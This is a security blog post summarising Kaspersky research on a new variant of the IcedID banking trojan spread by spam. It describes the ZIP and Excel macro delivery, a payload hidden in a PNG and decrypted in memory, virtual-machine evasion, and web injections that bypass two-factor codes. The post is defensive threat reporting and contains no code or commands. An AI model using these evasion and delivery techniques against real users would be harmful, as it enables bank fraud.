David Morán Sep 13, 2021 9 min read

New Spam Campaigns with a Variant of IcedID

Carrying out spam campaigns by email is one of attackers' most widely used means for introducing banking trojans among users. Today we are going to be talking about a campaign that Kaspersky researchers have observed, in which they have found messages written in English with ZIP attachments or links that led to the downloading of such files.

These files carry a new variant of the IcedID banking trojan that updates the version from 2017. The trojan is specific for Windows and while in previous versions it was compiled for 32 bits, it now appears to be compiled for 32 and 64 bits to have a greater scope.

Kaspersky has revealed that more than a total of 100 detections per day of the IcedID trojan have been reached. This IcedID campaign includes China as its main target, but there have also been campaigns that have reached other countries such as India, Italy, the United States and Germany.



Geography of IcedID downloader detections. Source: Kaspersky



IcedID (Trojan-Banker.Win32.IcedID), also known as BokBot, shares similarities with Emotet, a malware that was initially a banking trojan but that evolved thanks to its modularity. This new variant of IcedID can detect virtual machines, which is of interest to the attackers since their intention is to reach as many devices as possible but only those where they can achieve their objectives: to obtain banking information from users.

Another of IcedID's characteristics is that it uses web injections to steal one-time authentication codes, allowing cybercriminals to bypass two-step authentication and compromise a user's bank account. Thus, they do not need to have access to any of the user's other devices, as the infected computer is all they need.


Changes From the Previous Version

The IcedID banking trojan has been improved with a new downloader, which sends the information it collects from the user to the command and control center, such as their username, MAC or the version of Windows they use. In response, it sends back the payload with the trojan.


Configuration of the new downloader. Source: Kaspersky.

In previous versions of the trojan that we are writing about today, the downloader was compiled as an x86 executable and contained a false command and control center addresses to make it difficult for teams of analysts to analyze the samples. However, now in the new version, they have compiled the executable for x86-64 and have also eliminated the false addresses of the command and control center during its configuration.

The main payload of IcedID has been modified by the attackers, and although it is still distributed as an image with a PNG extension, what it actually contains is a PE (Portable Executable) file. The data related to the downloader is at the beginning instead of hiding a shellcode inside of it as in the previous version. However, the decryption and communication methods with the command and control center remain the same.

The dropper gets the main IcedID payload from the PNG image, decrypts it in memory and executes the binary. This way the trojan payload can start to use web injections and exfiltrate data to the command and control center.

The IcedID downloader has also been seen in Microsoft Excel files that contain macros that include URLs from which they download the trojan payload.



To bypass the signatures that detect trojans like IcedID, attackers make modifications to the malware payload. In this case, we have been able to see that although this particular trojan has been in circulation for several years, changes have been made in the way IcedID acts by adding anti-analysis techniques in the code so that when it detects that it is running in a virtual machine, it does not carry out any of the malicious activities that it implements.

In addition, given the level of daily infections detected by Kaspersky, it is important to make users aware of how careful they should be with the links they click on and the files they download, as they can easily become victims of this type of banking trojan.


Indicators of Compromise

Some indicators of compromise that have been found in different samples of this trojan are MD5 hashes

From Excel files with macros.

From ZIP documents.







David Morán

David has more than 15 years’ experience in cybersecurity, systems and development, starting out in an extinct hacking team known as Badchecksum. He collaborated on Defcon 19 with the Painsec security team. He is versed in scalable environments thanks to his work at the Tuenti social network with a traffic load of over 12Gbps. He has been involved with buguroo almost since the outset and has taken part in all the tools developed by the company, including source code analysers, malware analysis, cyber intelligence, etc. He also has in-depth knowledge of the Linux kernel, having developed LKMs that acted as rootkits as well as malware for Windows environments. He is currently the head of Revelock’s development team, managing task distribution and negotiating with the Head of Technology.